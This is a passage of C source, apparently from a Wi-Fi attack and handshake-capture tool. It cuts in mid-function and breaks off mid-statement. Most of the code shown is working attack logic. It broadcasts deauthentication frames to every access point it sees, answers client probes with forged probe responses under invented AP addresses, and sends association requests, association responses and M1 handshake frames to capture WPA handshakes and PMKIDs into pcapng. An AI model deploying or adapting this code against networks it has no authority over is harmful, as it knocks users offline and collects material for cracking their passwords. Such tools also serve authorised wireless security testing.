macfrx->sequence >> 4); } if(fd_pcapng != 0) { writeepb(fd_pcapng); } return; } /*===========================================================================*/ static inline void send_associationrequest(uint8_t *macap) { static int c; static mac_t *macftx; static aplist_t *zeiger; static const uint8_t associationrequestcapa[] = { 0x31, 0x04, 0x0a, 0x00 }; #define ASSOCIATIONREQUESTCAPA_SIZE sizeof(associationrequestcapa) static const uint8_t associationrequestdata[] = { 0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c, 0x32, 0x04, 0x0c, 0x12, 0x18, 0x60, 0x21, 0x02, 0x08, 0x14, 0x24, 0x02, 0x01, 0x0d, 0x2d, 0x1a, 0xad, 0x49, 0x17, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x7f, 0x08, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0xdd, 0x1e, 0x00, 0x90, 0x4c, 0x33, 0xad, 0x49, 0x17, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xdd, 0x07, 0x00, 0x50, 0xf2, 0x02, 0x00, 0x01, 0x00, }; #define ASSOCIATIONREQUEST_SIZE sizeof(associationrequestdata) static uint8_t packetout[1024]; if((filtermode == 1) && (checkfilterlistentry(macap) == true)) { return; } if((filtermode == 2) && (checkfilterlistentry(macap) == false)) { return; } if(checkpownedstaap(mac_mysta, macap) > 0) { return; } zeiger = aplist; for(c = 0; c < APLIST_MAX -1; c++) { if(zeiger->timestamp == 0) { return; } if(memcmp(zeiger->addr, macfrx->addr2, 6) == 0) { memset(&packetout, 0, HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +ASSOCIATIONREQUEST_SIZE +ESSID_LEN_MAX +RSN_LEN_MAX +6); memcpy(&packetout, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetout +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_ASSOC_REQ; memcpy(macftx->addr1, macap, 6); memcpy(macftx->addr2, &mac_mysta, 6); memcpy(macftx->addr3, macap, 6); macftx->duration = 0x013a; macftx->sequence = myassociationrequestsequence++ << 4; if(myassociationrequestsequence >= 4096) { myassociationrequestsequence = 0; } memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM], &associationrequestcapa, ASSOCIATIONREQUESTCAPA_SIZE); packetout[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +1] = zeiger->essid_len; memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +2], zeiger->essid, zeiger->essid_len); memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +zeiger->essid_len +2], &associationrequestdata, ASSOCIATIONREQUEST_SIZE); packetout[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +zeiger->essid_len +2 +ASSOCIATIONREQUEST_SIZE] = TAG_RSN; packetout[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +zeiger->essid_len +2 +ASSOCIATIONREQUEST_SIZE +1] = zeiger->rsn_len; memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +zeiger->essid_len +2 +ASSOCIATIONREQUEST_SIZE +1 +1], zeiger->rsn, zeiger->rsn_len); if(write(fd_socket, packetout, HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +zeiger->essid_len +2 +ASSOCIATIONREQUEST_SIZE +1 +1 +zeiger->rsn_len) < 0) { perror("\nfailed to transmit associationrequest"); errorcount++; outgoingcount--; } outgoingcount++; fsync(fd_socket); return; } zeiger++; } return; } /*===========================================================================*/ static inline void process80211association_req() { static uint8_t *essidtagptr; static ietag_t *essidtag; static uint8_t *associationrequestptr; static int associationrequestlen; if(attackclientflag == false) { send_associationresponse(macfrx->addr2, macfrx->addr1); usleep(M1WAITTIME); send_m1(macfrx->addr2, macfrx->addr1); } if(payload_len < (int)CAPABILITIESSTA_SIZE) { return; } associationrequestptr = payload_ptr +CAPABILITIESSTA_SIZE; associationrequestlen = payload_len -CAPABILITIESSTA_SIZE; if(associationrequestlen < (int)IETAG_SIZE) { return; } essidtagptr = gettag(TAG_SSID, associationrequestptr, associationrequestlen); if(essidtagptr == NULL) { return; } essidtag = (ietag_t*)essidtagptr; if(essidtag->len > ESSID_LEN_MAX) { return; } if((essidtag->len == 0) || (essidtag->len > ESSID_LEN_MAX) || (essidtag->data[0] == 0)) { return; } if(fd_pcapng != 0) { writeepb(fd_pcapng); } if((statusout & STATUS_ASSOC) == STATUS_ASSOC) { printtimenet(macfrx->addr1, macfrx->addr2); printessid(essidtag->len, essidtag->data); fprintf(stdout, " [ASSOCIATIONREQUEST, SEQUENCE %d]\n", macfrx->sequence >> 4); } return; } /*===========================================================================*/ static inline void process80211authentication() { static authf_t *auth; auth = (authf_t*)payload_ptr; if(payload_len < (int)AUTHENTICATIONFRAME_SIZE) { return; } if(macfrx->protected == 1) { if(fd_pcapng != 0) { writeepb(fd_pcapng); } if((statusout & STATUS_AUTH) == STATUS_AUTH) { printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [AUTHENTICATION, SHARED KEY ENCRYPTED KEY INSIDE], STATUS %d, SEQUENCE %d]\n", auth->statuscode, macfrx->sequence >> 4); } } else if(auth->authentication_algho == OPEN_SYSTEM) { if(attackapflag == false) { if(memcmp(macfrx->addr1, &mac_mysta, 6) == 0) { send_associationrequest(macfrx->addr2); } } if(attackclientflag == false) { if(auth->authentication_seq == 1) { if(memcmp(macfrx->addr2, &mac_mysta, 6) != 0) { send_authenticationresponseopensystem(macfrx->addr2, macfrx->addr1); } } } if(fd_pcapng != 0) { if(payload_len > 6) { if(memcmp(macfrx->addr2, &mac_mysta, 6) != 0) { writeepb(fd_pcapng); } } } if((statusout & STATUS_AUTH) == STATUS_AUTH) { printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [AUTHENTICATION, OPEN SYSTEM, STATUS %d, SEQUENCE %d]\n", auth->statuscode, macfrx->sequence >> 4); } } else if(auth->authentication_algho == SAE) { if(fd_pcapng != 0) { writeepb(fd_pcapng); } if((statusout & STATUS_AUTH) == STATUS_AUTH) { if(auth->authentication_seq == 1) { printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [AUTHENTICATION, SAE COMMIT, STATUS %d, SEQUENCE %d]\n", auth->statuscode, macfrx->sequence >> 4); } else if(auth->authentication_seq == 2) { if(memcmp(macfrx->addr1, macfrx->addr3, 6) == 0) { send_saefailure(macfrx->addr2, macfrx->addr1, macfrx->sequence >> 4); } printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [AUTHENTICATION, SAE CONFIRM, STATUS %d, SEQUENCE %d]\n", auth->statuscode, macfrx->sequence >> 4); } } } else if(auth->authentication_algho == SHARED_KEY) { if(fd_pcapng != 0) { writeepb(fd_pcapng); } if((statusout & STATUS_AUTH) == STATUS_AUTH) { printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [AUTHENTICATION, SHARED KEY, STATUS %d, SEQUENCE %d]\n", auth->statuscode, macfrx->sequence >> 4); } } else if(auth->authentication_algho == FBT) { if(fd_pcapng != 0) { writeepb(fd_pcapng); } if((statusout & STATUS_AUTH) == STATUS_AUTH) { printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [AUTHENTICATION, FAST TRANSITION, STATUS %d, SEQUENCE %d]\n", auth->statuscode, macfrx->sequence >> 4); } } else if(auth->authentication_algho == FILS) { if(fd_pcapng != 0) { writeepb(fd_pcapng); } if((statusout & STATUS_AUTH) == STATUS_AUTH) { printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [AUTHENTICATION, FILS, STATUS %d, SEQUENCE %d]\n", auth->statuscode, macfrx->sequence >> 4); } } else if(auth->authentication_algho == FILSPFS) { if(fd_pcapng != 0) { writeepb(fd_pcapng); } if((statusout & STATUS_AUTH) == STATUS_AUTH) { printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [AUTHENTICATION, FILS PFS, STATUS %d, SEQUENCE %d]\n", auth->statuscode, macfrx->sequence >> 4); } } else if(auth->authentication_algho == FILSPK) { if(fd_pcapng != 0) { writeepb(fd_pcapng); } if((statusout & STATUS_AUTH) == STATUS_AUTH) { printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [AUTHENTICATION, FILS PK, STATUS %d, SEQUENCE %d]\n", auth->statuscode, macfrx->sequence >> 4); } } else if(auth->authentication_algho == NETWORKEAP) { if(fd_pcapng != 0) { writeepb(fd_pcapng); } if((statusout & STATUS_AUTH) == STATUS_AUTH) { printtimenet(macfrx->addr1, macfrx->addr2); fprintf(stdout, " [AUTHENTICATION, NETWORK EAP, STATUS %d, SEQUENCE %d]\n", auth->statuscode, macfrx->sequence >> 4); } } else { if(fd_pcapng != 0) { writeepb(fd_pcapng); } } return; } /*===========================================================================*/ static inline void process80211probe_resp() { static aplist_t *zeiger; static uint8_t *apinfoptr; static int apinfolen; static uint8_t *essidtagptr; static ietag_t *essidtag = NULL; static uint8_t *channeltagptr; static ietag_t *channeltag = NULL; static uint8_t *rsntagptr; static ietag_t *rsntag = NULL; if(payload_len < (int)CAPABILITIESAP_SIZE) { return; } apinfoptr = payload_ptr +CAPABILITIESAP_SIZE; apinfolen = payload_len -CAPABILITIESAP_SIZE; if(apinfolen < (int)IETAG_SIZE) { return; } for(zeiger = aplist; zeiger < aplist +APLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) { aplist_ptr = zeiger; break; } if(memcmp(zeiger->addr, macfrx->addr2, 6) == 0) { zeiger->timestamp = timestamp; if((zeiger->essid_len == 0) || (zeiger->essid[0] == 0)) { essidtagptr = gettag(TAG_SSID, apinfoptr, apinfolen); if(essidtagptr != NULL) { essidtag = (ietag_t*)essidtagptr; if(essidtag->len <= ESSID_LEN_MAX) { zeiger->essid_len = essidtag->len; memcpy(zeiger->essid, essidtag->data, essidtag->len); } } } if(memcmp(&mac_mysta, macfrx->addr1, 6) == 0) { zeiger->status = 1; return; } if(((zeiger->count %apattacksintervall) == 0) && (zeiger->count < (apattacksmax *apattacksintervall))) { if(attackapflag == false) { send_directed_proberequest(macfrx->addr2, zeiger->essid_len, zeiger->essid); zeiger->status = 0; } } zeiger->count++; return; } } if((aplist_ptr -aplist) >= APLIST_MAX) { qsort(aplist, APLIST_MAX, APLIST_SIZE, sort_aplist_by_time); aplist_ptr = aplist; } memset(aplist_ptr, 0, APLIST_SIZE); aplist_ptr->timestamp = timestamp; if(memcmp(&mac_mysta, macfrx->addr1, 6) == 0) { aplist_ptr->status = 1; } memcpy(aplist_ptr->addr, macfrx->addr2, 6); aplist_ptr->channel = channelscanlist[cpa]; channeltagptr = gettag(TAG_CHAN, apinfoptr, apinfolen); if(channeltagptr != NULL) { channeltag = (ietag_t*)channeltagptr; aplist_ptr->channel = channeltag->data[0]; } essidtagptr = gettag(TAG_SSID, apinfoptr, apinfolen); if(essidtagptr != NULL) { essidtag = (ietag_t*)essidtagptr; if(essidtag->len <= ESSID_LEN_MAX) { aplist_ptr->essid_len = essidtag->len; memcpy(aplist_ptr->essid, essidtag->data, essidtag->len); } } rsntagptr = gettag(TAG_RSN, apinfoptr, apinfolen); if(rsntagptr != NULL) { rsntag = (ietag_t*)rsntagptr; if((rsntag->len >= 20) && (rsntag->len <= RSN_LEN_MAX)) { aplist_ptr->rsn_len = rsntag->len; memcpy(aplist_ptr->rsn, rsntag->data, rsntag->len); } } if(attackapflag == false) { if(memcmp(&mac_mysta, macfrx->addr1, 6) != 0) { send_directed_proberequest(macfrx->addr2, essidtag->len, essidtag->data); } aplist_ptr->count = 1; } if(fd_pcapng != 0) { writeepb(fd_pcapng); } if((statusout & STATUS_PROBES) == STATUS_PROBES) { printtimenet(macfrx->addr1, macfrx->addr2); printessid(aplist_ptr->essid_len, aplist_ptr->essid); fprintf(stdout, " [PROBERESPONSE, SEQUENCE %d, AP CHANNEL %d]\n", macfrx->sequence >> 4, aplist_ptr->channel); } aplist_ptr++; return; } /*===========================================================================*/ static inline void send_proberesponse(uint8_t *macsta, uint8_t *macap, uint8_t essid_len, uint8_t *essid) { static mac_t *macftx; static capap_t *capap; const uint8_t proberesponsedata[] = { 0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x0c, 0x12, 0x18, 0x24, 0x03, 0x01, 0x05, 0x2a, 0x01, 0x00, 0x32, 0x04, 0x30, 0x48, 0x60, 0x6c, 0x2d, 0x1a, 0xef, 0x11, 0x1b, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x04, 0x06, 0xe6, 0x47, 0x0d, 0x00, 0x3d, 0x16, 0x05, 0x0d, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x7f, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0xdd, 0x18, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x01, 0x00, 0x00, 0x03, 0xa4, 0x00, 0x00, 0x27, 0xa4, 0x00, 0x00, 0x42, 0x43, 0x5e, 0x00, 0x62, 0x32, 0x2f, 0x00, 0xdd, 0x09, 0x00, 0x03, 0x7f, 0x01, 0x01, 0x00, 0x00, 0xff, 0x7f, 0xdd, 0x0c, 0x00, 0x04, 0x0e, 0x01, 0x01, 0x02, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x14, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x02, 0x00, 0x00, 0xdd, 0x6f, 0x00, 0x50, 0xf2, 0x04, 0x10, 0x4a, 0x00, 0x01, 0x10, 0x10, 0x44, 0x00, 0x01, 0x02, 0x10, 0x3b, 0x00, 0x01, 0x03, 0x10, 0x47, 0x00, 0x10, 0xd5, 0x6c, 0x63, 0x68, 0xb0, 0x16, 0xf7, 0xc3, 0x09, 0x22, 0x34, 0x81, 0xc4, 0xe7, 0x99, 0x1b, 0x10, 0x21, 0x00, 0x03, 0x41, 0x56, 0x4d, 0x10, 0x23, 0x00, 0x04, 0x46, 0x42, 0x6f, 0x78, 0x10, 0x24, 0x00, 0x04, 0x30, 0x30, 0x30, 0x30, 0x10, 0x42, 0x00, 0x04, 0x30, 0x30, 0x30, 0x30, 0x10, 0x54, 0x00, 0x08, 0x00, 0x06, 0x00, 0x50, 0xf2, 0x04, 0x00, 0x01, 0x10, 0x11, 0x00, 0x04, 0x46, 0x42, 0x6f, 0x78, 0x10, 0x08, 0x00, 0x02, 0x23, 0x88, 0x10, 0x3c, 0x00, 0x01, 0x01, 0x10, 0x49, 0x00, 0x06, 0x00, 0x37, 0x2a, 0x00, 0x01, 0x20 }; #define PROBERESPONSE_SIZE sizeof(proberesponsedata) static uint8_t packetout[1024]; if((filtermode == 1) && (checkfilterlistentry(macsta) == true)) { return; } if((filtermode == 2) && (checkfilterlistentry(macsta) == false)) { return; } if(checkpownedstaap(macsta, macap) >= 3) { return; } memset(&packetout, 0, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +ESSID_LEN_MAX +IETAG_SIZE +1); memcpy(&packetout, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetout +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_PROBE_RESP; memcpy(macftx->addr1, macsta, 6); memcpy(macftx->addr2, macap, 6); memcpy(macftx->addr3, macap, 6); macftx->sequence = myproberesponsesequence++ << 4; if(myproberesponsesequence >= 4096) { myproberesponsesequence = 0; } capap = (capap_t*)(packetout +HDRRT_SIZE +MAC_SIZE_NORM); capap->timestamp = mytime; capap->beaconintervall = 0x640; capap->capabilities = 0x431; packetout[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE] = 0; packetout[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +1] = essid_len; memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE], essid, essid_len); memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE +essid_len], &proberesponsedata, PROBERESPONSE_SIZE); packetout[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE +essid_len +0x0c] = channelscanlist[cpa]; if(write(fd_socket, packetout, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE +essid_len +PROBERESPONSE_SIZE) < 0) { perror("\nfailed to transmit proberesponse"); errorcount++; outgoingcount--; } fsync(fd_socket); outgoingcount++; return; } /*===========================================================================*/ static inline void process80211probe_req() { static uint8_t *essidtagptr; static ietag_t *essidtag; static myaplist_t *zeiger; if(payload_len < (int)IETAG_SIZE) { return; } essidtagptr = gettag(TAG_SSID, payload_ptr, payload_len); if(essidtagptr == NULL) { return; } essidtag = (ietag_t*)essidtagptr; if((essidtag->len == 0) || (essidtag->len > ESSID_LEN_MAX) || (essidtag->data[0] == 0)) { return; } for(zeiger = myaplist; zeiger < myaplist +MYAPLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) { myaplist_ptr = zeiger; break; } if((zeiger->essid_len == essidtag->len) && (memcmp(zeiger->essid, essidtag->data, essidtag->len) == 0)) { zeiger->timestamp = timestamp; send_proberesponse(macfrx->addr2, zeiger->addr, zeiger->essid_len, zeiger->essid); return; } } if((myaplist_ptr -myaplist) >= MYAPLIST_MAX) { qsort(myaplist, MYAPLIST_MAX, MYAPLIST_SIZE, sort_myaplist_by_time); myaplist_ptr = myaplist; } memset(myaplist_ptr, 0, MYAPLIST_SIZE); myaplist_ptr->timestamp = timestamp; mynicap++; myaplist_ptr->addr[5] = mynicap & 0xff; myaplist_ptr->addr[4] = (mynicap >> 8) & 0xff; myaplist_ptr->addr[3] = (mynicap >> 16) & 0xff; myaplist_ptr->addr[2] = myouiap & 0xff; myaplist_ptr->addr[1] = (myouiap >> 8) & 0xff; myaplist_ptr->addr[0] = (myouiap >> 16) & 0xff; myaplist_ptr->essid_len = essidtag->len; memcpy(myaplist_ptr->essid, essidtag->data, essidtag->len); send_proberesponse(macfrx->addr2, myaplist_ptr->addr, myaplist_ptr->essid_len, myaplist_ptr->essid); if(fd_pcapng != 0) { writeepb(fd_pcapng); } if((statusout & STATUS_PROBES) == STATUS_PROBES) { printtimenet(macfrx->addr1, macfrx->addr2); printessid(myaplist_ptr->essid_len, myaplist_ptr->essid); fprintf(stdout, " [PROBEREQUEST, SEQUENCE %d]\n", macfrx->sequence >> 4); } aplist_ptr++; return; } /*===========================================================================*/ static inline void process80211directed_probe_req() { static uint8_t *essidtagptr; static ietag_t *essidtag; static myaplist_t *zeiger; if(payload_len < (int)IETAG_SIZE) { return; } essidtagptr = gettag(TAG_SSID, payload_ptr, payload_len); if(essidtagptr == NULL) { return; } essidtag = (ietag_t*)essidtagptr; if((essidtag->len == 0) || (essidtag->len > ESSID_LEN_MAX) || (essidtag->data[0] == 0)) { return; } for(zeiger = myaplist; zeiger < myaplist +MYAPLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) { myaplist_ptr = zeiger; break; } if((memcmp(zeiger->addr, macfrx->addr1, 6) == 0) && (zeiger->essid_len == essidtag->len) && (memcmp(zeiger->essid, essidtag->data, essidtag->len) == 0)) { zeiger->timestamp = timestamp; send_proberesponse(macfrx->addr2, zeiger->addr, zeiger->essid_len, zeiger->essid); return; } } if((myaplist_ptr -myaplist) >= MYAPLIST_MAX) { qsort(myaplist, MYAPLIST_MAX, MYAPLIST_SIZE, sort_myaplist_by_time); myaplist_ptr = myaplist; } memset(myaplist_ptr, 0, MYAPLIST_SIZE); myaplist_ptr->timestamp = timestamp; memcpy(myaplist_ptr->addr, macfrx->addr1, 6); myaplist_ptr->essid_len = essidtag->len; memcpy(myaplist_ptr->essid, essidtag->data, essidtag->len); send_proberesponse(macfrx->addr2, myaplist_ptr->addr, myaplist_ptr->essid_len, myaplist_ptr->essid); if(fd_pcapng != 0) { writeepb(fd_pcapng); } if((statusout & STATUS_PROBES) == STATUS_PROBES) { printtimenet(macfrx->addr1, macfrx->addr2); printessid(aplist_ptr->essid_len, aplist_ptr->essid); fprintf(stdout, " [PROBEREQUEST, SEQUENCE %d]\n", macfrx->sequence >> 4); } aplist_ptr++; return; } /*===========================================================================*/ static inline void process80211rcascanproberesponse() { static aplist_t *zeiger; static uint8_t *apinfoptr; static int apinfolen; static uint8_t *essidtagptr; static ietag_t *essidtag = NULL; static uint8_t *channeltagptr; static ietag_t *channeltag = NULL; static uint8_t *rsntagptr; static ietag_t *rsntag = NULL; if(payload_len < (int)CAPABILITIESAP_SIZE) { return; } apinfoptr = payload_ptr +CAPABILITIESAP_SIZE; apinfolen = payload_len -CAPABILITIESAP_SIZE; if(apinfolen < (int)IETAG_SIZE) { return; } for(zeiger = aplist; zeiger < aplist +APLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) { aplist_ptr = zeiger; break; } if(memcmp(zeiger->addr, macfrx->addr2, 6) == 0) { zeiger->timestamp = timestamp; if((zeiger->essid_len == 0) || (zeiger->essid[0] == 0)) { essidtagptr = gettag(TAG_SSID, apinfoptr, apinfolen); if(essidtagptr != NULL) { essidtag = (ietag_t*)essidtagptr; if(essidtag->len <= ESSID_LEN_MAX) { zeiger->essid_len = essidtag->len; memcpy(zeiger->essid, essidtag->data, essidtag->len); } } } if(memcmp(&mac_mysta, macfrx->addr1, 6) == 0) { zeiger->status = 1; return; } if(((zeiger->count %apattacksintervall) == 0) && (zeiger->count < (apattacksmax *apattacksintervall))) { if(attackapflag == false) { send_directed_proberequest(macfrx->addr2, zeiger->essid_len, zeiger->essid); zeiger->status = 0; } } zeiger->count++; return; } } if((aplist_ptr -aplist) >= APLIST_MAX) { qsort(aplist, APLIST_MAX, APLIST_SIZE, sort_aplist_by_time); aplist_ptr = aplist; } memset(aplist_ptr, 0, APLIST_SIZE); aplist_ptr->timestamp = timestamp; if(memcmp(&mac_mysta, macfrx->addr1, 6) == 0) { aplist_ptr->status = 1; } memcpy(aplist_ptr->addr, macfrx->addr2, 6); aplist_ptr->channel = channelscanlist[cpa]; channeltagptr = gettag(TAG_CHAN, apinfoptr, apinfolen); if(channeltagptr != NULL) { channeltag = (ietag_t*)channeltagptr; aplist_ptr->channel = channeltag->data[0]; } essidtagptr = gettag(TAG_SSID, apinfoptr, apinfolen); if(essidtagptr != NULL) { essidtag = (ietag_t*)essidtagptr; if(essidtag->len <= ESSID_LEN_MAX) { aplist_ptr->essid_len = essidtag->len; memcpy(aplist_ptr->essid, essidtag->data, essidtag->len); } } rsntagptr = gettag(TAG_RSN, apinfoptr, apinfolen); if(rsntagptr != NULL) { rsntag = (ietag_t*)rsntagptr; if((rsntag->len >= 20) && (rsntag->len <= RSN_LEN_MAX)) { aplist_ptr->rsn_len = rsntag->len; memcpy(aplist_ptr->rsn, rsntag->data, rsntag->len); } } if(attackapflag == false) { if(memcmp(&mac_mysta, macfrx->addr1, 6) != 0) { send_directed_proberequest(macfrx->addr2, essidtag->len, essidtag->data); } aplist_ptr->count++; } if(fd_pcapng != 0) { writeepb(fd_pcapng); } aplist_ptr++; aplistcount++; if(aplistcount > APLIST_MAX) { aplistcount = APLIST_MAX; } return; } /*===========================================================================*/ static inline void process80211rcascanbeacon() { static aplist_t *zeiger; static uint8_t *apinfoptr; static int apinfolen; static uint8_t *essidtagptr; static ietag_t *essidtag = NULL; static uint8_t *channeltagptr; static ietag_t *channeltag = NULL; static uint8_t *rsntagptr; static ietag_t *rsntag = NULL; if(payload_len < (int)CAPABILITIESAP_SIZE) { return; } apinfoptr = payload_ptr +CAPABILITIESAP_SIZE; apinfolen = payload_len -CAPABILITIESAP_SIZE; if(apinfolen < (int)IETAG_SIZE) { return; } for(zeiger = aplist; zeiger < aplist +APLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) { aplist_ptr = zeiger; break; } if(memcmp(zeiger->addr, macfrx->addr2, 6) == 0) { if(memcmp(&mac_mysta, macfrx->addr1, 6) == 0) { zeiger->status = 1; } if(((zeiger->count %apattacksintervall) == 0) && (zeiger->count < (apattacksmax *apattacksintervall))) { if(attackapflag == false) { zeiger->status = 0; send_directed_proberequest(macfrx->addr2, zeiger->essid_len, zeiger->essid); } } zeiger->count++; return; } } if((aplist_ptr -aplist) >= APLIST_MAX) { qsort(aplist, APLIST_MAX, APLIST_SIZE, sort_aplist_by_time); aplist_ptr = aplist; } memset(aplist_ptr, 0, APLIST_SIZE); aplist_ptr->timestamp = timestamp; if(memcmp(&mac_mysta, macfrx->addr1, 6) == 0) { aplist_ptr->status = 1; } memcpy(aplist_ptr->addr, macfrx->addr2, 6); aplist_ptr->channel = channelscanlist[cpa]; channeltagptr = gettag(TAG_CHAN, apinfoptr, apinfolen); if(channeltagptr != NULL) { channeltag = (ietag_t*)channeltagptr; aplist_ptr->channel = channeltag->data[0]; } essidtagptr = gettag(TAG_SSID, apinfoptr, apinfolen); if(essidtagptr != NULL) { essidtag = (ietag_t*)essidtagptr; if(essidtag->len <= ESSID_LEN_MAX) { aplist_ptr->essid_len = essidtag->len; memcpy(aplist_ptr->essid, essidtag->data, essidtag->len); } } rsntagptr = gettag(TAG_RSN, apinfoptr, apinfolen); if(rsntagptr != NULL) { rsntag = (ietag_t*)rsntagptr; if((rsntag->len >= 20) && (rsntag->len <= RSN_LEN_MAX)) { aplist_ptr->rsn_len = rsntag->len; memcpy(aplist_ptr->rsn, rsntag->data, rsntag->len); } } if(attackapflag == false) { send_directed_proberequest(macfrx->addr2, essidtag->len, essidtag->data); } if(fd_pcapng != 0) { writeepb(fd_pcapng); } aplist_ptr++; aplistcount++; if(aplistcount > APLIST_MAX) { aplistcount = APLIST_MAX; } return; } /*===========================================================================*/ static inline void process80211beacon() { static aplist_t *zeiger; static uint8_t *apinfoptr; static int apinfolen; static uint8_t *essidtagptr; static ietag_t *essidtag = NULL; static uint8_t *channeltagptr; static ietag_t *channeltag = NULL; static uint8_t *rsntagptr; static ietag_t *rsntag = NULL; if(payload_len < (int)CAPABILITIESAP_SIZE) { return; } apinfoptr = payload_ptr +CAPABILITIESAP_SIZE; apinfolen = payload_len -CAPABILITIESAP_SIZE; if(apinfolen < (int)IETAG_SIZE) { return; } for(zeiger = aplist; zeiger < aplist +APLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) { aplist_ptr = zeiger; break; } if(memcmp(zeiger->addr, macfrx->addr2, 6) == 0) { zeiger->timestamp = timestamp; if(((zeiger->count %deauthenticationintervall) == 0) && (zeiger->count < (deauthenticationsmax *deauthenticationintervall))) { if(deauthenticationflag == false) { send_broadcast_deauthentication(macfrx->addr2, WLAN_REASON_UNSPECIFIED); } } if(((zeiger->count %apattacksintervall) == 0) && (zeiger->count < (apattacksmax *apattacksintervall))) { if(attackapflag == false) { if((zeiger->rsn_len != 0) && (zeiger->essid_len != 0) && (zeiger->essid[0] != 0)) { send_authenticationrequestopensystem(macfrx->addr2); } else { send_directed_proberequest(macfrx->addr2, essidtag->len, essidtag->data); } } } zeiger->count++; return; } } if((aplist_ptr -aplist) >= APLIST_MAX) { qsort(aplist, APLIST_MAX, APLIST_SIZE, sort_aplist_by_time); aplist_ptr = aplist; } if(deauthenticationflag == false) { send_broadcast_deauthentication(macfrx->addr2, WLAN_REASON_UNSPECIFIED); send_broadcast_deauthentication(macfrx->addr2 ,WLAN_REASON_UNSPECIFIED); aplist_ptr->count = 2; } memset(aplist_ptr, 0, APLIST_SIZE); aplist_ptr->timestamp = timestamp; if(memcmp(&mac_mysta, macfrx->addr1, 6) == 0) { aplist_ptr->status = 1; } memcpy(aplist_ptr->addr, macfrx->addr2, 6); aplist_ptr->channel = channelscanlist[cpa]; channeltagptr = gettag(TAG_CHAN, apinfoptr, apinfolen); if(channeltagptr != NULL) { channeltag = (ietag_t*)channeltagptr; aplist_ptr->channel = channeltag->data[0]; } essidtagptr = gettag(TAG_SSID, apinfoptr, apinfolen); if(essidtagptr != NULL) { essidtag = (ietag_t*)essidtagptr; if(essidtag->len <= ESSID_LEN_MAX) { aplist_ptr->essid_len = essidtag->len; memcpy(aplist_ptr->essid, essidtag->data, essidtag->len); } } rsntagptr = gettag(TAG_RSN, apinfoptr, apinfolen); if(rsntagptr != NULL) { rsntag = (ietag_t*)rsntagptr; if((rsntag->len >= 20) && (rsntag->len <= RSN_LEN_MAX)) { aplist_ptr->rsn_len = rsntag->len; memcpy(aplist_ptr->rsn, rsntag->data, rsntag->len); } } else { aplist_ptr->status = 0; } aplist_ptr->essid_len = essidtag->len; memset(aplist_ptr->essid, 0, ESSID_LEN_MAX); memcpy(aplist_ptr->essid, essidtag->data, essidtag->len); if(attackapflag == false) { if((aplist_ptr->rsn_len != 0) && 